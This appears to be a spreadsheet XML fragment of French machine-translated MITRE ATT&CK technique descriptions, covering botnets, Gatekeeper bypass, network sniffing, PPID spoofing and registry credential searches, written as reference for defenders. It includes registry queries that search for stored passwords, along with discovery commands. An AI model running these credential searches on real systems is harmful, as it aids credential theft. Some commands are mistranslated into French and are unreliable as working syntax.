    <t>Les adversaires peuvent acheter, louer ou louer un réseau de systèmes compromis qui peuvent être utilisés lors du ciblage. Un botnet est un réseau de systèmes compromis qui peuvent être chargés d’effectuer des tâches coordonnées. (Référence : Norton Botnet) Les adversaires peuvent acheter un abonnement pour utiliser un botnet existant à partir d’un service de démarrage/stresseur. Lorsqu’ils disposent d’un botnet, les adversaires peuvent effectuer des activités de suivi telles que le [phishing](https://attack.mitre.org/techniques/T1566) ou le déni de service distribué (DDoS) à grande échelle. (Citation : Imperva DDoS à louer)(Citation : Krebs-Anna)(Citation : Krebs-Bazaar)(Citation : Krebs-Booter)
https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent acquérir les informations d’identification des utilisateurs auprès de gestionnaires de mots de passe tiers. (Citation : ise Password Manager février 2019) Les gestionnaires de mots de passe sont des applications conçues pour stocker les informations d’identification de l’utilisateur, normalement dans une base de données cryptée. Les informations d’identification sont généralement accessibles une fois qu’un utilisateur a fourni un mot de passe principal qui déverrouille la base de données. Une fois la base de données déverrouillée, ces informations d’identification peuvent être copiées en mémoire. Ces bases de données peuvent être stockées sous forme de fichiers sur disque. (Citation : ise Password Manager février 2019)
Les adversaires peuvent acquérir les informations d’identification de l’utilisateur à partir de gestionnaires de mots de passe en extrayant le mot de passe principal et/ou les informations d’identification en texte brut de la mémoire. (Citation : FoxIT Wocao, décembre 2019)(Citation : Github KeeThief) Les adversaires peuvent extraire des informations d’identification de la mémoire via [Exploitation pour l’accès aux informations d’identification](https://attack.mitre.org/techniques/T1212). (Référence : NVD CVE-2019-3610)
 Les adversaires peuvent également essayer de forcer brutalement via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) pour obtenir le mot de passe principal d’un gestionnaire de mots de passe. (Citation : Cyberreason Anchor décembre 2019)
https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les attributs de fichier et contourner la fonctionnalité Gatekeeper pour échapper aux invites de l’utilisateur et exécuter des programmes non fiables. Gatekeeper est un ensemble de technologies qui agissent comme une couche du modèle de sécurité d’Apple pour s’assurer que seules les applications de confiance sont exécutées sur un hôte. Gatekeeper a été conçu sur la base de la mise en quarantaine des fichiers dans Snow Leopard (10.6, 2009) et s’est développé pour inclure la signature de code, la conformité aux politiques de sécurité, la notarisation, etc. Gatekeeper traite également les applications qui s’exécutent pour la première fois différemment des applications rouvertes. (Citation : La quarantaine de TheEclecticLightCompany et le drapeau)(Citation : TheEclecticLightCompany notarisation de pomme)
Sur la base d’un système d’opt-in, lorsque des fichiers sont téléchargés, un attribut étendu (xattr) appelé « com.apple.quarantine » (également connu sous le nom d’indicateur de quarantaine) peut être défini sur le fichier par l’application qui effectue le téléchargement. Launch Services ouvre l’application dans un état suspendu. Pour les applications de première exécution avec l’indicateur de quarantaine défini, Gatekeeper exécute les fonctions suivantes :
1. Vérifie l’attribut étendu – Gatekeeper vérifie l’indicateur de quarantaine, puis fournit une invite d’alerte à l’utilisateur pour autoriser ou refuser l’exécution. (Citation : OceanLotus pour OS X)(Citation : 20 outils et techniques courants macOS)
2. Vérifie les politiques système - Gatekeeper vérifie la politique de sécurité du système, permettant l’exécution d’applications téléchargées uniquement à partir de l’App Store ou de l’App Store et des développeurs identifiés.
3. Signature de code – Gatekeeper vérifie si une signature de code valide provient d’un identifiant de développeur Apple.
4. Notarisation - À l’aide de l’API « api.apple-cloudkit.com », Gatekeeper contacte les serveurs Apple pour vérifier ou retirer le ticket de notarisation et s’assurer que le ticket n’est pas révoqué. Les utilisateurs peuvent remplacer la notarisation, ce qui entraînera une invite d’exécution d’une « application non autorisée » et la politique de sécurité sera modifiée.
Les adversaires peuvent contourner un ou plusieurs contrôles de sécurité dans les vérifications Gatekeeper par le biais d’erreurs logiques (par exemple, [Exploitation pour l’évasion de la défense](https://attack.mitre.org/techniques/T1211)), de types de fichiers non vérifiés et de bibliothèques externes. Par exemple, avant macOS 13 Ventura, les vérifications de signature de code et de notarisation n’étaient effectuées qu’au premier lancement, ce qui permettait aux adversaires d’écrire des exécutables malveillants dans des applications précédemment ouvertes afin de contourner les contrôles de sécurité de Gatekeeper. (Citation : contournement du gardien de l’evilbit 2021)(Citation : Manipulation du paquet d’applications Brandon Dalton)
Les applications et les fichiers chargés sur le système à partir d’une clé USB, d’un disque optique, d’un disque dur externe, d’un lecteur partagé sur le réseau local ou à l’aide de la commande curl peuvent ne pas définir l’indicateur de quarantaine. De plus, il est possible d’éviter de définir l’indicateur de quarantaine à l’aide de [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent préparer un environnement opérationnel pour infecter les systèmes qui visitent un site Web au cours de leur navigation normale. Les systèmes de terminaux peuvent être compromis en naviguant sur des sites contrôlés par l’adversaire, comme dans [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Dans de tels cas, le navigateur Web de l’utilisateur est généralement ciblé pour l’exploitation (ne nécessitant souvent aucune interaction supplémentaire de l’utilisateur une fois arrivé sur le site), mais les adversaires peuvent également configurer des sites Web pour un comportement de non-exploitation tel que [Jeton d’accès à l’application](https://attack.mitre.org/techniques/T1550/001). Avant [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), les adversaires doivent mettre en commun les ressources nécessaires pour diffuser cet exploit aux utilisateurs qui naviguent vers un site contrôlé par l’adversaire. Le contenu intempestif peut être hébergé sur une infrastructure contrôlée par l’adversaire qui a été acquise ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou précédemment compromise ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)).
Les adversaires peuvent télécharger ou injecter du contenu Web malveillant, tel que [JavaScript](https://attack.mitre.org/techniques/T1059/007), dans des sites Web. (Citation : FireEye CFR Watering Hole 2012)(Référence : Gallagher 2015) Cela peut se faire de plusieurs façons, notamment :
* Insertion de scripts malveillants dans des pages Web ou d’autres contenus Web contrôlables par l’utilisateur, tels que des messages de forum
* Modification des fichiers de script servis aux sites Web à partir de compartiments de stockage cloud accessibles en écriture publique
* Élaborer des publicités Web malveillantes et acheter de l’espace publicitaire sur un site Web par l’intermédiaire de fournisseurs de publicité légitimes (c’est-à-dire [Malvertising](https://attack.mitre.org/techniques/T1583/008))
En plus de mettre en scène du contenu pour exploiter le navigateur Web d’un utilisateur, les adversaires peuvent également mettre en scène du contenu de script pour profiler le navigateur de l’utilisateur (comme dans [Recueillir des informations sur l’hôte de la victime](https://attack.mitre.org/techniques/T1592)) pour s’assurer qu’il est vulnérable avant de tenter de l’exploiter. (Citation : ATT ScanBox)
Les sites Web compromis par un adversaire et utilisés pour organiser un drive-by peuvent être ceux visités par une communauté spécifique, telle qu’un gouvernement, un secteur particulier ou une région, où l’objectif est de compromettre un utilisateur spécifique ou un groupe d’utilisateurs en fonction d’un intérêt commun. Ce type de campagne ciblée fait référence à une compromission stratégique du Web ou à une attaque de point d’eau.
Les adversaires peuvent acheter des domaines similaires à des domaines légitimes (par exemple : homoglyphes, typosquattage, domaine de premier niveau différent, etc.) lors de l’acquisition d’infrastructures ([Domaines](https://attack.mitre.org/techniques/T1583/001)) pour faciliter la [compromission intempestive](https://attack.mitre.org/techniques/T1189).
https://attack.mitre.org/techniques/T1608/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de recueillir des informations sur les services du système local enregistrés. Les adversaires peuvent obtenir des informations sur les services à l’aide d’outils ainsi que de commandes utilitaires du système d’exploitation telles que &lt;code&gt;sc query&lt;/code&gt;, &lt;code&gt;tasklist /svc&lt;/code&gt;, &lt;code&gt;systemctl --type=service&lt;/code&gt; et &lt;code&gt;net start&lt;/code&gt;.
Les adversaires peuvent utiliser les informations de [System Service Discovery](https://attack.mitre.org/techniques/T1007) lors de la découverte automatique pour façonner des comportements ultérieurs, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>Les adversaires peuvent renifler passivement le trafic réseau pour capturer des informations sur un environnement, y compris le matériel d’authentification transmis sur le réseau. Le reniflage de réseau fait référence à l’utilisation de l’interface réseau d’un système pour surveiller ou capturer des informations envoyées via une connexion filaire ou sans fil. Un adversaire peut placer une interface réseau en mode de promiscuité pour accéder passivement aux données en transit sur le réseau, ou utiliser des ports de portée pour capturer une plus grande quantité de données.
Les données capturées via cette technique peuvent inclure les informations d’identification de l’utilisateur, en particulier celles envoyées via un protocole non sécurisé et non chiffré. Les techniques d’empoisonnement de la résolution de service de noms, telles que [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), peuvent également être utilisées pour capturer des informations d’identification vers des sites Web, des proxys et des systèmes internes en redirigeant le trafic vers un adversaire.
Le reniflage du réseau peut révéler des détails de configuration, tels que les services en cours d’exécution, les numéros de version et d’autres caractéristiques du réseau (par exemple, les adresses IP, les noms d’hôte, les ID VLAN) nécessaires aux activités ultérieures de [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) et/ou d'[Évasion de défense](https://attack.mitre.org/tactics/TA0005). Les adversaires peuvent également utiliser le reniflage du réseau pendant [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) pour acquérir passivement des connaissances supplémentaires sur l’environnement.
Dans les environnements basés sur le cloud, les adversaires peuvent toujours être en mesure d’utiliser les services de mise en miroir du trafic pour détecter le trafic réseau des machines virtuelles. Par exemple, AWS Traffic Mirroring, GCP Packet Mirroring et Azure vTap permettent aux utilisateurs de définir des instances spécifiées à partir desquelles collecter le trafic et des cibles spécifiées auxquelles envoyer le trafic collecté. (Citation : Mise en miroir du trafic AWS)(Citation : Mise en miroir des paquets GCP)(Référence : Azure Virtual Network TAP) Souvent, une grande partie de ce trafic est en texte clair en raison de l’utilisation de la terminaison TLS au niveau de l’équilibreur de charge pour réduire la charge de chiffrement et de déchiffrement du trafic. (Citation : Rhino Security Labs AWS VPC Traffic Mirroring)(Citation : SpecterOps AWS Traffic Mirroring) L’adversaire peut ensuite utiliser des techniques d’exfiltration telles que le transfert de données vers un compte cloud afin d’accéder au trafic reniflé. (Citation : Rhino Security Labs AWS VPC Traffic Mirroring)
Sur les périphériques réseau, les adversaires peuvent effectuer des captures réseau à l’aide des commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'monitor capture'. (Référence : US-CERT-TA18-106A)(Référence : capture_embedded_packet_on_software)
https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer, acquérir ou voler des matériaux de signature de code pour signer leurs logiciels malveillants ou leurs outils. La signature de code fournit un niveau d’authenticité sur un binaire de la part du développeur et une garantie que le binaire n’a pas été altéré. (citation : Signature du code Wikipédia) Les certificats utilisés lors d’une opération peuvent être créés, acquis ou volés par l’adversaire. (Citation : Securelist Digital Certificates) (Citation : Symantec Digital Certificates) Contrairement à [Signature de code non valide](https://attack.mitre.org/techniques/T1036/001), cette activité aboutira à une signature valide.
La signature de code pour vérifier le logiciel lors de la première exécution peut être utilisée sur les systèmes Windows et macOS modernes. Il n’est pas utilisé sur Linux en raison de la nature décentralisée de la plate-forme. (citation : Signature du code Wikipédia)(Citation : EclecticLightChecksonEXECodeSigning)
Les certificats de signature de code peuvent être utilisés pour contourner les stratégies de sécurité qui nécessitent l’exécution du code signé sur un système.
https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder aux données à partir du stockage dans le cloud.
De nombreux fournisseurs IaaS proposent des solutions de stockage d’objets de données en ligne, telles qu’Amazon S3, Azure Storage et Google Cloud Storage. De même, les plates-formes d’entreprise SaaS telles qu’Office 365 et Google Workspace fournissent un stockage de documents basé sur le cloud aux utilisateurs via des services tels que OneDrive et Google Drive, tandis que les fournisseurs d’applications SaaS tels que Slack, Confluence, Salesforce et Dropbox peuvent fournir des solutions de stockage dans le cloud en tant que périphérique ou cas d’utilisation principal de leur plate-forme. 
Dans certains cas, comme pour le stockage cloud basé sur IaaS, il n’existe pas d’application globale (telle que SQL ou Elasticsearch) avec laquelle interagir avec les objets stockés : au lieu de cela, les données de ces solutions sont récupérées directement via l'[API cloud](https://attack.mitre.org/techniques/T1059/009). Dans les applications SaaS, les adversaires peuvent être en mesure de collecter ces données directement à partir d’API ou d’objets de stockage cloud backend, plutôt que via leur application ou interface frontale (c’est-à-dire, [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). 
Les adversaires peuvent collecter des données sensibles à partir de ces solutions de stockage dans le cloud. Les fournisseurs proposent généralement des guides de sécurité pour aider les utilisateurs finaux à configurer les systèmes, bien que les erreurs de configuration soient un problème courant. (Référence : Sécurité Amazon S3, 2019)(Citation : Sécurité du stockage Microsoft Azure, 2019)(Citation : Meilleures pratiques de stockage dans le cloud de Google, 2019) Il y a eu de nombreux incidents où le stockage dans le cloud a été mal sécurisé, généralement en autorisant involontairement l’accès public à des utilisateurs non authentifiés, un accès trop large par tous les utilisateurs, ou même un accès pour toute personne anonyme hors du contrôle du système de gestion des identités et des accès sans même avoir besoin des autorisations utilisateur de base.
Ce libre accès peut exposer divers types de données sensibles, telles que des cartes de crédit, des informations personnellement identifiables ou des dossiers médicaux. (Citation : Trend Micro S3 Exposed PII, 2017)(Citation : Godets Magecart S3 câblés, 2019)(Référence : HIPAA Journal S3 Breach, 2017)(Citation : Rclone-mega-extortion_05_2021)
Les adversaires peuvent également obtenir puis abuser des informations d’identification divulguées à partir de référentiels sources, de journaux ou d’autres moyens afin d’accéder à des objets de stockage dans le cloud.
https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les systèmes afin de manipuler les données au fur et à mesure qu’elles sont consultées et affichées à un utilisateur final, menaçant ainsi l’intégrité des données. (Citation : FireEye APT38 octobre 2018)(Citation : DOJ Lazarus Sony 2018) En manipulant les données d’exécution, les adversaires peuvent tenter d’affecter un processus métier, la compréhension organisationnelle et la prise de décision.
Les adversaires peuvent modifier les fichiers binaires d’application utilisés pour afficher les données afin de provoquer des manipulations d’exécution. Les adversaires peuvent également effectuer [Modifier l’association de fichiers par défaut](https://attack.mitre.org/techniques/T1546/001) et [Mascarade](https://attack.mitre.org/techniques/T1036) pour provoquer un effet similaire. Le type de modification et l’impact qu’elle aura dépendent de l’application et du processus cibles, ainsi que des buts et objectifs de l’adversaire. Pour les systèmes complexes, un adversaire aurait probablement besoin d’une expertise particulière et peut-être d’un accès à des logiciels spécialisés liés au système, ce qui serait généralement obtenu par le biais d’une campagne de collecte d’informations prolongée afin d’avoir l’impact souhaité.
https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer des recherches dans le registre des systèmes compromis à la recherche d’informations d’identification stockées de manière non sécurisée. Le registre Windows stocke des informations de configuration qui peuvent être utilisées par le système ou d’autres programmes. Les adversaires peuvent interroger le registre à la recherche d’informations d’identification et de mots de passe qui ont été stockés pour être utilisés par d’autres programmes ou services. Parfois, ces informations d’identification sont utilisées pour les ouvertures de session automatiques.
Exemples de commandes pour trouver des clés de registre liées aux informations de mot de passe : (Citation : Pentestlab Stored Credentials)
* Ruche de la machine locale : &lt;code&gt;requête reg HKLM /f mot de passe /t REG_SZ /s&lt;/code&gt;
* Ruche de l’utilisateur actuel : &lt;code&gt;requête reg HKCU /f mot de passe /t REG_SZ /s&lt;/code&gt;
https://attack.mitre.org/techniques/T1552/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des dossiers et des lecteurs partagés sur des systèmes distants comme moyen d’identifier les sources d’information à recueillir en tant que précurseur de la collecte et d’identifier les systèmes d’intérêt potentiels pour le mouvement latéral. Les réseaux contiennent souvent des lecteurs et des dossiers réseau partagés qui permettent aux utilisateurs d’accéder à des répertoires de fichiers sur différents systèmes d’un réseau. 
Le partage de fichiers sur un réseau Windows s’effectue via le protocole SMB. (citation : ressource partagée de Wikipédia) (Citation : Dossier partagé TechNet) [Net](https://attack.mitre.org/software/S0039) peut être utilisé pour interroger un système distant sur les lecteurs partagés disponibles à l’aide de la commande &lt;code&gt;net view \\\\remotesystem&lt;/code&gt;. Il peut également être utilisé pour interroger des lecteurs partagés sur le système local à l’aide de &lt;code&gt;net share&lt;/code&gt;. Pour macOS, la commande &lt;code&gt;sharing -l&lt;/code&gt; répertorie tous les points partagés utilisés pour les services smb.
https://attack.mitre.org/techniques/T1135</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de recueillir des informations sur les périphériques et les composants connectés à un système informatique. (Citation : Peripheral Discovery Linux)(Citation : Découverte de périphériques macOS) Les périphériques peuvent inclure des ressources auxiliaires qui prennent en charge diverses fonctionnalités telles que des claviers, des imprimantes, des appareils photo, des lecteurs de cartes à puce ou des dispositifs de stockage amovibles. Les informations peuvent être utilisées pour améliorer leur connaissance du système et de l’environnement du réseau ou peuvent être utilisées pour d’autres actions.
https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>Un adversaire peut tenter d’échapper à l’analyse basée sur l’arborescence des processus en modifiant l’ID de processus parent (PPID) du logiciel malveillant exécuté. Si un logiciel de protection des endpoints exploite la relation « parent-enfant » pour la détection, la rupture de cette relation peut faire en sorte que le comportement de l’adversaire ne soit pas associé à l’activité précédente de l’arborescence des processus. Sur les systèmes Unix, la rupture de cet arbre de processus est une pratique courante pour les administrateurs qui exécutent des logiciels à l’aide de scripts et de programmes. (Citation : 3OHA double-fourche 2022) 
Sur les systèmes Linux, les adversaires peuvent exécuter une série d’appels [API natifs](https://attack.mitre.org/techniques/T1106) pour modifier l’arborescence des processus des logiciels malveillants. Par exemple, les adversaires peuvent exécuter leur charge utile sans aucun argument, appeler deux fois l’appel d’API « fork() », puis faire en sorte que le processus parent se termine. Cela crée un processus petit-fils sans processus parent qui est immédiatement adopté par le processus système « init » (PID 1), qui déconnecte avec succès l’exécution de la charge utile de l’adversaire de son arborescence de processus précédente.
Un autre exemple est l’utilisation de l’appel système « daemon » pour se détacher du processus parent actuel et s’exécuter en arrière-plan. (Citation : Sandfly BPFDoor 2022)(Citation : Microsoft XorDdos Linux Stealth 2022)
https://attack.mitre.org/techniques/T1036/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur la topologie du réseau de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les topologies de réseau peuvent inclure une variété de détails, y compris la disposition physique et/ou logique des environnements réseau externes et internes. Ces informations peuvent également inclure des détails concernant les périphériques réseau (passerelles, routeurs, etc.) et d’autres infrastructures.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les informations sur les topologies de réseau peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : benne à ordures DNS) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596) ou [Rechercher dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établir des ressources opérationnelles (ex : [Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des certificats de signature de code auto-signés qui peuvent être utilisés lors du ciblage. La signature de code est le processus de signature numérique d’exécutables et de scripts pour confirmer l’auteur du logiciel et garantir que le code n’a pas été modifié ou corrompu. La signature de code fournit un niveau d’authenticité pour un programme de la part du développeur et une garantie que le programme n’a pas été altéré. (citation : Signature du code Wikipédia) Les utilisateurs et/ou les outils de sécurité peuvent faire plus confiance à un morceau de code signé qu’à un morceau de code non signé, même s’ils ne savent pas qui a émis le certificat ou qui en est l’auteur.
Avant [Code Signing](https://attack.mitre.org/techniques/T1553/002), les adversaires peuvent développer des certificats de signature de code auto-signés pour les utiliser dans les opérations.
https://attack.mitre.org/techniques/T1587/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les autorisations/attributs de fichiers ou de répertoires pour contourner les listes de contrôle d’accès (ACL) et accéder aux fichiers protégés. (Citation : Hybrid Analysis Icacls1 juin 2018)(Citation : Analyse hybride Icacls2 mai 2018) Les autorisations de fichiers et de répertoires sont généralement gérées par des listes de contrôle d’accès configurées par le propriétaire du fichier ou du répertoire, ou par les utilisateurs disposant des autorisations appropriées. Les implémentations de listes de contrôle d’accès de fichiers et de répertoires varient selon la plate-forme, mais désignent généralement explicitement quels utilisateurs ou groupes peuvent effectuer quelles actions (lecture, écriture, exécution, etc.).
Windows implémente les listes de contrôle d’accès de fichiers et de répertoires sous forme de listes de contrôle d’accès discrétionnaires (DACL). (Citation : Microsoft DACL mai 2018) À l’instar d’une liste de contrôle d’accès standard, les DACL identifient les comptes dont l’accès à un objet sécurisable est autorisé ou refusé. Lorsqu’une tentative d’accès à un objet sécurisable est effectuée, le système vérifie les entrées de contrôle d’accès dans la DACL dans l’ordre. Si une entrée correspondante est trouvée, l’accès à l’objet est accordé. Dans le cas contraire, l’accès est refusé. (Citation : Listes de contrôle d’accès Microsoft mai 2018)
Les adversaires peuvent interagir avec les DACL à l’aide de commandes Windows intégrées, telles que « icacls », « cacls », « takeown » et « attrib », qui peuvent accorder aux adversaires des autorisations plus élevées sur des fichiers et des dossiers spécifiques. De plus, [PowerShell](https://attack.mitre.org/techniques/T1059/001) fournit des applets de commande qui peuvent être utilisées pour récupérer ou modifier des DACL de fichiers et de répertoires. Des modifications spécifiques de fichiers et de répertoires peuvent être une étape nécessaire pour de nombreuses techniques, telles que l’établissement de la persistance via [Fonctionnalités d’accessibilité](https://attack.mitre.org/techniques/T1546/008), [Scripts d’initialisation de démarrage ou de connexion](https://attack.mitre.org/techniques/T1037), ou l’altération/détournement d’autres fichiers binaires/de configuration instrumentaux via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des compléments Microsoft Office pour obtenir la persistance sur un système compromis. Les compléments Office peuvent être utilisés pour ajouter des fonctionnalités aux programmes Office. (Citation : Compléments Microsoft Office) Il existe différents types de compléments qui peuvent être utilisés par les différents produits Office ; y compris les bibliothèques de compléments Word/Excel (WLL/XLL), les compléments VBA, les compléments COM (Office Component Object Model), les compléments d’automatisation, l’éditeur VBA (VBE), les compléments Visual Studio Tools pour Office (VSTO) et les compléments Outlook. (Citation : Compléments de persistance de MRWLabs Office)(Référence : FireEye Mail CDS 2018)
Les compléments peuvent être utilisés pour obtenir la persistance, car ils peuvent être configurés pour exécuter du code au démarrage d’une application Office.
https://attack.mitre.org/techniques/T1137/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des agents de transport Microsoft pour établir un accès persistant aux systèmes. Les agents de transport Microsoft Exchange peuvent opérer sur les messages électroniques passant par le pipeline de transport pour effectuer diverses tâches telles que le filtrage du courrier indésirable, le filtrage des pièces jointes malveillantes, la journalisation ou l’ajout d’une signature d’entreprise à la fin de tous les e-mails sortants. (Référence : Microsoft TransportAgent juin 2016)(Citation : ESET LightNeuron mai 2019) Les agents de transport peuvent être écrits par les développeurs d’applications, puis compilés dans des assemblys .NET qui sont ensuite inscrits auprès du serveur Exchange. Les agents de transport seront appelés au cours d’une étape spécifiée du traitement des e-mails et exécuteront des tâches définies par le développeur. 
Les adversaires peuvent inscrire un agent de transport malveillant pour fournir un mécanisme de persistance dans Exchange Server qui peut être déclenché par des événements de courrier électronique spécifiés par l’adversaire. (Citation : ESET LightNeuron mai 2019) Bien qu’un agent de transport malveillant puisse être appelé pour tous les e-mails passant par le pipeline de transport Exchange, l’agent peut être configuré pour n’effectuer que des tâches spécifiques en réponse à des critères définis par l’adversaire. Par exemple, l’agent de transport ne peut effectuer une action telle que la copie des pièces jointes en transit et leur sauvegarde en vue d’une exfiltration ultérieure que si l’adresse e-mail du destinataire correspond à une entrée d’une liste fournie par l’adversaire.
https://attack.mitre.org/techniques/T1505/002</t>
  </si>
  <si>
    <t>Un adversaire peut tenter d’obtenir des informations détaillées sur le système d’exploitation et le matériel, y compris la version, les correctifs, les correctifs, les Service Packs et l’architecture. Les adversaires peuvent utiliser les informations de la [Découverte des informations système](https://attack.mitre.org/techniques/T1082) lors de la découverte automatique pour façonner les comportements de suivi, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
Des outils tels que [Systeminfo](https://attack.mitre.org/software/S0096) peuvent être utilisés pour collecter des informations détaillées sur le système. Si vous utilisez un accès privilégié, une répartition des données système peut être collectée via l’outil de configuration du &lt;code&gt;système&lt;/code&gt; sur macOS. À titre d’exemple, les adversaires disposant d’un accès au niveau de l’utilisateur peuvent exécuter la commande &lt;code&gt;df -aH&lt;/code&gt; pour obtenir les disques actuellement montés et l’espace libre disponible associé. Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour collecter des informations détaillées sur le système (par exemple, &lt;code&gt;afficher la version&lt;/code&gt;). (Référence : US-CERT-TA18-106A) [Découverte des informations système](https://attack.mitre.org/techniques/T1082) combiné aux informations recueillies lors d’autres formes de découverte et de reconnaissance peut favoriser le développement et la dissimulation de la charge utile. (Référence : OSX. FairyTale)(Citation : 20 outils et techniques courants macOS)
Les fournisseurs de cloud d’infrastructure en tant que service (IaaS) tels que AWS, GCP et Azure permettent d’accéder aux informations d’instance et de machine virtuelle via des API. Les appels d’API authentifiés réussis peuvent renvoyer des données telles que le système d’exploitation, la plate-forme et l’état d’une instance particulière ou la vue du modèle d’une machine virtuelle. (citation : Amazon Describe Instance)(citation : ressource Google Instances)(Citation : Microsoft Virutal Machine API)
https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide de protocoles de couche application OSI pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Les adversaires peuvent utiliser de nombreux protocoles différents, notamment ceux utilisés pour la navigation Web, le transfert de fichiers, le courrier électronique, le DNS ou la publication/l’abonnement. Pour les connexions qui se produisent en interne au sein d’une enclave (par exemple, celles entre un nœud proxy ou pivot et d’autres nœuds), les protocoles couramment utilisés sont SMB, SSH ou RDP. (Citation : Mandiant APT29 Eye Spy Email 22 novembre)
https://attack.mitre.org/techniques/T1071</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant la façon dont le .NET « AppDomainManager » charge les assemblys. Le framework .NET utilise la classe « AppDomainManager » pour créer et gérer un ou plusieurs environnements d’exécution isolés (appelés domaines d’application) à l’intérieur d’un processus afin d’héberger l’exécution d’applications .NET. Les assemblys (binaires .exe ou .dll compilés pour s’exécuter en tant que code .NET) peuvent être chargés dans un domaine d’application en tant que code exécutable. (Citation : Domaines d’application Microsoft) 
Connue sous le nom d'« injection AppDomainManager », les adversaires peuvent exécuter du code arbitraire en détournant la façon dont les applications .NET chargent les assemblys. Par exemple, les logiciels malveillants peuvent créer un domaine d’application personnalisé à l’intérieur d’un processus cible pour charger et exécuter un assembly arbitraire. Alternativement, les fichiers de configuration (« .config ») ou les variables d’environnement de processus qui définissent les paramètres d’exécution .NET peuvent être falsifiés pour indiquer à des applications .NET autrement inoffensives de charger un assembly malveillant (identifié par son nom) dans le processus cible. (Citation : PenTestLabs AppDomainManagerInject)(Citation : PwC Yellow Liderc)(Citation : Injection de Rapid7 AppDomain Manager)
https://attack.mitre.org/techniques/T1574/014</t>
  </si>
  <si>
    <t>Les adversaires peuvent regrouper les données collectées à partir de plusieurs systèmes dans un emplacement central ou un répertoire sur un seul système avant l’exfiltration. Les données peuvent être conservées dans des fichiers distincts ou combinées en un seul fichier grâce à des techniques telles que [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Des shells de commande interactifs peuvent être utilisés, et des fonctionnalités communes à [cmd](https://attack.mitre.org/software/S0106) et bash peuvent être utilisées pour copier des données dans un emplacement de stockage.
Dans les environnements cloud, les adversaires peuvent regrouper les données au sein d’une instance ou d’une machine virtuelle particulière avant de les exfiltrer. Un adversaire peut [Créer une instance cloud](https://attack.mitre.org/techniques/T1578/002) et regrouper les données dans cette instance. (Citation : Mandiant M-Trends 2020)
En stockant les données sur un système avant l’exfiltration, les adversaires peuvent minimiser le nombre de connexions établies à leur serveur C2 et mieux échapper à la détection.
https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>Un adversaire peut ajouter des rôles ou des autorisations supplémentaires à un compte d’utilisateur ou de service contrôlé par l’adversaire afin de maintenir un accès persistant à un système d’orchestration de conteneurs. Par exemple, un adversaire disposant d’autorisations suffisantes peut créer un RoleBinding ou un ClusterRoleBinding pour lier un Role ou un ClusterRole à un compte Kubernetes. (Référence : Kubernetes RBAC)(Citation : Attaque Aquasec Kubernetes 2023) Lorsque le contrôle d’accès basé sur les attributs (ABAC) est utilisé, un adversaire disposant d’autorisations suffisantes peut modifier une stratégie ABAC Kubernetes pour accorder au compte cible des autorisations supplémentaires. (Citation : Kuberentes ABAC)
Cette modification de compte peut immédiatement suivre [Créer un compte](https://attack.mitre.org/techniques/T1136) ou toute autre activité malveillante du compte. Les adversaires peuvent également modifier les [Comptes valides](https://attack.mitre.org/techniques/T1078) existants qu’ils ont compromis.  
